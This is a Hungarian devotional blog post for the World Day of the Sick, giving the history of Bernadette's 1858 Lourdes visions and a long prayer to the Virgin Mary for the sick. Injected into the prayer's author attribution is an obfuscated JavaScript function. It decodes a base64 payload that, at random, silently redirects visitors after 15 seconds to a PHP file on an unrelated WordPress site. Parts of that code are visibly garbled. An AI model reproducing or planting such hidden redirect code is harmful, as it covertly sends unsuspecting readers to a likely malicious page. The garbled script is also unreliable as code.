Lourdes-i Boldogasszony – Betegek Világnapja

38768_tumblr_lsrg55udlh1qfm47jo1_1280.jpg

23 évvel ezelőtt, Szent II. János Pál pápa kezdeményezésére a mai napot a Betegek Világnapjává nyílvánították. A világnap annak emlékére jött létre, hogy a francia Pireneusok lábánál, Lourdes-ban rőzsegyűjtés közben egy barlangnál 1858. február 11-én látomása volt Soubirous Bernadettnek, az akkor 14 éves, beteges, szegény sorsú kislánynak. A látomások ismétlődtek, majd február 15-én a sziklabarlangban csodatevő forrás fakadt. A jelenések helyén 1864-ben templomot építettek. A világnap célja, hogy az emberek kellő figyelmet szenteljenek a betegekre, így is elősegítve a szenvedés megértését.

Betegek anyja, Szűz Mária!

Virrassz a földkerekség minden betegének ágya mellett!
Azok mellett, akik ebben az órában veszítik el öntudatukat,
akik haláltusájukat vívják,
akiknek nincs semmi reményük a gyógyulásra,
akik fájdalmukban sírnak és jajgatnak,
akiket senki sem ápol, mert nincs rá pénzük,
akik menni szeretnének, de nyugton kell feküdniük,
akiknek pihenniük kellene, de a szükség munkára kényszeríti őket,
akik nyugtalanul hánykolódnak fekhelyükön,
akik a hosszú éjszakákat álmatlanul,
nyitott szemmel töltik,
akiket betegség közben még a családjuk szükségének gondjai is kínoznak,
akiknek végleg le kell mondaniuk jövő terveikről,
akik nem hisznek a túlvilágban,
akik Isten ellen zúgolódnak, káromolják és átkozzák Őt,
akik nem tudják, hogy Krisztus őérettük is szenvedett!
(Fernfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');and Lelotte SJ)

About the author

maradmin

Leave a Comment